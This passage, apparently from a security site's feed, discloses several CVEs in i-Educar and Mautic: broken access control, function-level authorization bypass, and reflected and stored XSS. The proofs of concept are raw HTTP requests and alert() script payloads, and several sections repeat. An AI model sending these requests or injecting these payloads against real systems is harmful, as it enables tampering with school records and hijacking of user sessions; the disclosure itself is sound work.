height="711" srcset="/p/cve-2025-10012/image-1_hu_a4b5d2b9604e251f.png 480w, /p/cve-2025-10012/image-1_hu_465e2cc1a3c3c305.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="220" data-flex-basis="528px" /></p> <p style="text-align: justify;">Observe the time delay in the server response, indicating the successful execution of the SQL payload.</p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Unauthorized access to sensitive data (e.g., users, passwords, logs).</li> <li>Database enumeration (schemas, tables, users, versions).</li> <li>Escalation to RCE depending on DB configuration (e.g., xp_cmdshell, UDFs).</li> <li>Full compromise of the application if chained with other vulnerabilities.</li> <li>This issue affects all users and environments, as it does not require authentication and is reachable via a public endpoint.</li> </ul> </p> <h2 id="reference">Reference </h2><p><em><strong><a class="link" href="https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10012.md" target="_blank" rel="noopener" >https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10012.md</a></strong></em></p> <h2 id="finder">Finder </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Fri, 05 Sep 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-10013/ https://www.cvehunters.com/p/cve-2025-10013/ <h2 id="cve-2025-10013-broken-access-control-in-exportacao-para-o-seb-endpoint">CVE-2025-10013: Broken Access Control in <code>/exportacao-para-o-seb</code> Endpoint </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-10013" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-10013</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Broken Access Control vulnerability was identified in the <code>/exportacao-para-o-seb</code> endpoint of the i-educar application. This vulnerability allows users without proper permissions to access restricted functionality, bypassing authorization checks.</p> <h2 id="details">Details </h2><p style="text-align: justify;"><b>Vulnerable Endpoint:</b> <code>POST /exportacao-para-o-seb</code></br><b>Authentication:</b> Required</br></br>The application fails to properly validate user permissions before granting access to this endpoint. As a result, even low-privileged users can successfully access the functionality intended only for .</p><h2 id="cve-2025-10013-broken-access-control-in-exportacao-para-o-seb-endpoint">CVE-2025-10013: Broken Access Control in <code>/exportacao-para-o-seb</code> Endpoint </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-10013" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-10013</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Broken Access Control vulnerability was identified in the <code>/exportacao-para-o-seb</code> endpoint of the i-educar application. This vulnerability allows users without proper permissions to access restricted functionality, bypassing authorization checks.</p> <h2 id="details">Details </h2><p style="text-align: justify;"><b>Vulnerable Endpoint:</b> <code>POST /exportacao-para-o-seb</code></br><b>Authentication:</b> Required</br></br>The application fails to properly validate user permissions before granting access to this endpoint. As a result, even low-privileged users can successfully access the functionality intended only for .</p> <h2 id="poc">PoC </h2><p style="text-align: justify;"><ul><li>Authenticate as a non-privileged user.</li></ul></p> <p><img src="/p/cve-2025-10013/image.png" width="1843" height="533" srcset="/p/cve-2025-10013/image_hu_5ca2ea85ab6696dd.png 480w, /p/cve-2025-10013/image_hu_deb570b2049417e1.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="345" data-flex-basis="829px" /></p> <p><img src="/p/cve-2025-10013/image-1.png" width="936" height="436" srcset="/p/cve-2025-10013/image-1_hu_8cd5643a33eabd47.png 480w, /p/cve-2025-10013/image-1_hu_f205df0666d7bd3a.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="214" data-flex-basis="515px" /></p> <p style="text-align: justify;"><ul><li>Send the following request:</li></ul></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl">POST /exportacao-para-o-seb HTTP/1.1 </span></span><span class="line"><span class="cl">Host: localhost </span></span><span class="line"><span class="cl">User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 </span></span><span class="line"><span class="cl">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 </span></span><span class="line"><span class="cl">Accept-Language: en-US,en;q=0.5 </span></span><span class="line"><span class="cl">Accept-Encoding: gzip, deflate, br, zstd </span></span><span class="line"><span class="cl">Content-Type: application/x-www-form-urlencoded </span></span><span class="line"><span class="cl">Content-Length: 47 </span></span><span class="line"><span class="cl">Origin: http://localhost </span></span><span class="line"><span class="cl">Connection: keep-alive </span></span><span class="line"><span class="cl">Referer: http://localhost/exportacao-para-o-seb </span></span><span class="line"><span class="cl">Cookie: i_educar_session=ikrAPvWjSx0V5drm82zlgu1kBByJdsCx1gJkiwsu </span></span><span class="line"><span class="cl">Upgrade-Insecure-Requests: 1 </span></span><span class="line"><span class="cl">Sec-Fetch-Dest: document </span></span><span class="line"><span class="cl">Sec-Fetch-Mode: navigate </span></span><span class="line"><span class="cl">Sec-Fetch-Site: same-origin </span></span><span class="line"><span class="cl">Sec-Fetch-User: ?1 </span></span><span class="line"><span class="cl">Priority: u=0, i </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">ano=2025<span class="err">&</span>ref_cod_instituicao=1<span class="err">&</span>ref_cod_escola=4 </span></span></code></pre></td></tr></table> </div> </div><p style="text-align: justify;"><ul><li>We could observe that a file is attached to the response. This user shouldn't do this request.</li></ul></p> <p><img src="/p/cve-2025-10013/image-2.png" width="1434" height="538" srcset="/p/cve-2025-10013/image-2_hu_d9f0374d4aca283a.png 480w, /p/cve-2025-10013/image-2_hu_6d9f4bc0f197d6ba.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="266" data-flex-basis="639px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;">Broken Access Control vulnerabilities can have severe consequences, including: <ul> <li>Unauthorized access to restricted functionality;</li> <li>Escalation of privileges for low-level users;</li> <li>Exposure of sensitive data and potential system compromise;</li> <li>Loss of confidentiality and integrity of educational records;</li> <li>Reputational damage to the organization.</li> </ul> </p> <h2 id="reference">Reference </h2><p><em><strong><a class="link" href="https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10013.md" target="_blank" rel="noopener" >https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10013.md</a></strong></em></p> <h2 id="finder">Finder </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Fri, 05 Sep 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-9823/ https://www.cvehunters.com/p/cve-2025-9823/ <h2 id="cve-2025-9823-cross-site-scripting-xss-reflected-in-endpoint-sajaxactionleadaddleadtags-parameter-tags">CVE-2025-9823: Cross-Site Scripting (XSS) Reflected in endpoint <code>/s/ajax?action=lead:addLeadTags</code> parameter <code>Tags</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9823" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9823</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the <code>search_autocomplete</code> endpoint of the Mautic application. This vulnerability allows attackers to inject malicious scripts into the <code>Tags</code> parameter.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>/s/ajax?action=lead:addLeadTags</code></p> <p>Parameter: <code>Tags</code></p> <p style="text-align: justify;">The application reflects this input directly in the response. Although the server applies sanitization before storing the data or returning it later, the payload is executed immediately in the victim’s browser upon reflection, allowing an attacker to run arbitrary JavaScript in the user’s session.</p><h2 id="cve-2025-9823-cross-site-scripting-xss-reflected-in-endpoint-sajaxactionleadaddleadtags-parameter-tags">CVE-2025-9823: Cross-Site Scripting (XSS) Reflected in endpoint <code>/s/ajax?action=lead:addLeadTags</code> parameter <code>Tags</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9823" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9823</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the <code>search_autocomplete</code> endpoint of the Mautic application. This vulnerability allows attackers to inject malicious scripts into the <code>Tags</code> parameter.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>/s/ajax?action=lead:addLeadTags</code></p> <p>Parameter: <code>Tags</code></p> <p style="text-align: justify;">The application reflects this input directly in the response. Although the server applies sanitization before storing the data or returning it later, the payload is executed immediately in the victim’s browser upon reflection, allowing an attacker to run arbitrary JavaScript in the user’s session.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl">"><span class="p"><</span><span class="nt">script</span><span class="p">></span><span class="nx">alert</span><span class="p">(</span><span class="s1">'XSS'</span><span class="p">)</</span><span class="nt">script</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><em><strong><a class="link" href="https://github.com/mautic/mautic/security/advisories/GHSA-9v8p-m85m-f7mm" target="_blank" rel="noopener" >https://github.com/mautic/mautic/security/advisories/GHSA-9v8p-m85m-f7mm</a></strong></em></p> <h2 id="finder">Finder </h2><p><a class="link" href="https://www.linkedin.com/in/nmmorette/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette/" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Wed, 03 Sep 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-9760/ https://www.cvehunters.com/p/cve-2025-9760/ <h2 id="cve-2025-9760-broken-function-level-authorization-bfla-on-matricula-api-allows-deletion-of-abandono-status">CVE-2025-9760: Broken Function Level Authorization (BFLA) on <code>matricula</code> API allows deletion of “abandono” status </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9760" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9760</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A <b>Broken Function Level Authorization (BFLA)</b> vulnerability was identified in the <code>matricula</code> API of the i-Educar application. This issue allows low-privileged users to delete the “abandono” (dropout) status of arbitrary student enrollments by manipulating request parameters.</p> <h2 id="details">Details </h2><p style="text-align: justify;"><b>Vulnerable Endpoint:</b></br><code>GET /module/Api/aluno</code></br></br>The application fails to enforce authorization checks to ensure that only privileged users (e.g., administrators) can perform sensitive operations like deleting an abandonment status. By altering the <code>id</code> parameter, an attacker can affect records that do not belong to them.</p><h2 id="cve-2025-9760-broken-function-level-authorization-bfla-on-matricula-api-allows-deletion-of-abandono-status">CVE-2025-9760: Broken Function Level Authorization (BFLA) on <code>matricula</code> API allows deletion of “abandono” status </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9760" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9760</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A <b>Broken Function Level Authorization (BFLA)</b> vulnerability was identified in the <code>matricula</code> API of the i-Educar application. This issue allows low-privileged users to delete the “abandono” (dropout) status of arbitrary student enrollments by manipulating request parameters.</p> <h2 id="details">Details </h2><p style="text-align: justify;"><b>Vulnerable Endpoint:</b></br><code>GET /module/Api/aluno</code></br></br>The application fails to enforce authorization checks to ensure that only privileged users (e.g., administrators) can perform sensitive operations like deleting an abandonment status. By altering the <code>id</code> parameter, an attacker can affect records that do not belong to them.</p> <h2 id="poc">PoC </h2><p style="text-align: justify;"><ul><li>Authenticate as a non-privileged user.</li></ul></p> <p><img src="/p/cve-2025-9760/image.png" width="1380" height="528" srcset="/p/cve-2025-9760/image_hu_e9ed6b29581f01dc.png 480w, /p/cve-2025-9760/image_hu_374181a535d27950.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="261" data-flex-basis="627px" /></p> <p style="text-align: justify;"><ul><li>Send the following request:</li></ul></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl">GET /module/Api/matricula?<span class="err">&</span>oper=delete<span class="err">&</span>resource=abandono<span class="err">&</span>id=206 HTTP/1.1 </span></span><span class="line"><span class="cl">Host: localhost </span></span><span class="line"><span class="cl">User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 </span></span><span class="line"><span class="cl">Accept: application/json, text/javascript, */*; q=0.01 </span></span><span class="line"><span class="cl">Accept-Language: en-US,en;q=0.5 </span></span><span class="line"><span class="cl">Accept-Encoding: gzip, deflate, br, zstd </span></span><span class="line"><span class="cl">X-Requested-With: XMLHttpRequest </span></span><span class="line"><span class="cl">Connection: keep-alive </span></span><span class="line"><span class="cl">Referer: http://localhost/intranet/educar_matricula_det.php?cod_matricula=206 </span></span><span class="line"><span class="cl">Cookie: i_educar_session=Mz9IKWGOP641g4BLkSGRnxs69wk4ChmUUxUerX19 </span></span><span class="line"><span class="cl">Sec-Fetch-Dest: empty </span></span><span class="line"><span class="cl">Sec-Fetch-Mode: cors </span></span><span class="line"><span class="cl">Sec-Fetch-Site: same-origin </span></span><span class="line"><span class="cl">Priority: u=0 </span></span></code></pre></td></tr></table> </div> </div><p style="text-align: justify;"><ul><li>We could observe that the deletion was successful.</li></ul></p> <p><img src="/p/cve-2025-9760/image-1.png" width="1574" height="542" srcset="/p/cve-2025-9760/image-1_hu_6621613282a2babf.png 480w, /p/cve-2025-9760/image-1_hu_7a7d76a95a6fa6ef.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="290" data-flex-basis="696px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;">This is a Broken Function Level Authorization (BFLA) vulnerability, as categorized by OWASP API Security Top 10 (2023) - API4. The consequences include: <ul> <li>Tampering with academic data without authorization.</li> <li>Loss of data integrity in school records.</li> <li>Potential legal and reputational damage for educational institutions.</li> </ul> </p> <h2 id="reference">Reference </h2><p><em><strong><a class="link" href="https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-9760.md" target="_blank" rel="noopener" >https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-9760.md</a></strong></em></p> <h2 id="finder">Finder </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Mon, 01 Sep 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-9720/ https://www.cvehunters.com/p/cve-2025-9720/ <h2 id="cve-2025-9720-cross-site-scripting-xss-stored-endpoint-tabelaarredondamentoedit-parameter-nome">CVE-2025-9720: Cross-Site Scripting (XSS) Stored endpoint <code>TabelaArredondamento/edit</code> parameter <code>nome</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9720" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9720</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>TabelaArredondamento/edit</code> endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the <code>nome</code> parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>TabelaArredondamento/edit</code></p><h2 id="cve-2025-9720-cross-site-scripting-xss-stored-endpoint-tabelaarredondamentoedit-parameter-nome">CVE-2025-9720: Cross-Site Scripting (XSS) Stored endpoint <code>TabelaArredondamento/edit</code> parameter <code>nome</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9720" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9720</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>TabelaArredondamento/edit</code> endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the <code>nome</code> parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>TabelaArredondamento/edit</code></p> <p>Parameter: <code>nome</code></p> <p style="text-align: justify;">The application fails to properly validate and sanitize user inputs in the <code>nome</code> parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim's browser, potentially compromising the user's data and system.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl">"><span class="p"><</span><span class="nt">img</span> <span class="na">src</span><span class="o">=</span><span class="s">x</span> <span class="na">onerror</span><span class="o">=</span><span class="s">alert('CVE-Hunters')</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-9720/image.png" width="646" height="278" srcset="/p/cve-2025-9720/image_hu_9177624e6cc80aee.png 480w, /p/cve-2025-9720/image_hu_228acf1500b7defe.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="232" data-flex-basis="557px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><em><strong><a class="link" href="https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-9720.md" target="_blank" rel="noopener" >https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-9720.md</a></strong></em></p> <h2 id="finder">Finder </h2><p><a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/karina50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" >Karina Gante</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Sun, 31 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-9721/ https://www.cvehunters.com/p/cve-2025-9721/ <h2 id="cve-2025-9721-multiples-cross-site-scripting-xss-stored-in-endpoint-formulamediaedit">CVE-2025-9721: Multiples Cross-Site Scripting (XSS) Stored in endpoint <code>FormulaMedia/edit</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9721" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9721</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">Multiples Stored Cross-Site Scripting (XSS) vulnerabilities was identified in the <code>FormulaMedia/edit</code> endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the <code>nome</code> and <code>formulaMedia</code> parameters. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>/module/FormulaMedia/edit</code></p><h2 id="cve-2025-9721-multiples-cross-site-scripting-xss-stored-in-endpoint-formulamediaedit">CVE-2025-9721: Multiples Cross-Site Scripting (XSS) Stored in endpoint <code>FormulaMedia/edit</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9721" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9721</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">Multiples Stored Cross-Site Scripting (XSS) vulnerabilities was identified in the <code>FormulaMedia/edit</code> endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the <code>nome</code> and <code>formulaMedia</code> parameters. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>/module/FormulaMedia/edit</code></p> <p>Parameters: <code>nome</code> and <code>formulaMedia</code></p> <p style="text-align: justify;">The application fails to properly validate and sanitize user inputs in the <code>nome</code> and <code>formulaMedia</code> parameters. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim's browser, potentially compromising the user's data and system.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl">"><span class="p"><</span><span class="nt">img</span> <span class="na">src</span><span class="o">=</span><span class="s">x</span> <span class="na">onerror</span><span class="o">=</span><span class="s">alert('CVE-Hunters')</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-9721/image.png" width="575" height="237" srcset="/p/cve-2025-9721/image_hu_a20ceff440c81918.png 480w, /p/cve-2025-9721/image_hu_dbd5009a60ec4280.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="242" data-flex-basis="582px" /></p> <p><img src="/p/cve-2025-9721/image-1.png" width="567" height="221" srcset="/p/cve-2025-9721/image-1_hu_36237c6d629f87b.png 480w, /p/cve-2025-9721/image-1_hu_10da103514a2b8fa.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="256" data-flex-basis="615px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><em><strong><a class="link" href="https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-9721.md" target="_blank" rel="noopener" >https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-9721.md</a></strong></em></p> <h2 id="finder">Finder </h2><p><a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/karina50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" >Karina Gante</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Sun, 31 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-9722/ https://www.cvehunters.com/p/cve-2025-9722/ <h2 id="cve-2025-9722-multiples-cross-site-scripting-xss-stored-in-endpoint-educar_tipo_ocorrencia_disciplinar_cadphp">CVE-2025-9722: Multiples Cross-Site Scripting (XSS) Stored in endpoint <code>educar_tipo_ocorrencia_disciplinar_cad.php</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9722" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9722</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">Multiples Stored Cross-Site Scripting (XSS) vulnerabilities was identified in the <code>educar_tipo_ocorrencia_disciplinar_cad.php</code> endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the <code>nm_tipo</code> and <code>descricao</code> parameters. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>/intranet/educar_tipo_ocorrencia_disciplinar_cad.php</code></p><h2 id="cve-2025-9722-multiples-cross-site-scripting-xss-stored-in-endpoint-educar_tipo_ocorrencia_disciplinar_cadphp">CVE-2025-9722: Multiples Cross-Site Scripting (XSS) Stored in endpoint <code>educar_tipo_ocorrencia_disciplinar_cad.php</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9722" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9722</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">Multiples Stored Cross-Site Scripting (XSS) vulnerabilities was identified in the <code>educar_tipo_ocorrencia_disciplinar_cad.php</code> endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the <code>nm_tipo</code> and <code>descricao</code> parameters. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>/intranet/educar_tipo_ocorrencia_disciplinar_cad.php</code></p> <p>Parameters: <code>nm_tipo</code> and <code>descricao</code></p> <p style="text-align: justify;">The application fails to properly validate and sanitize user inputs in the <code>nm_tipo</code> and <code>descricao</code> parameters. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim's browser, potentially compromising the user's data and system.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre 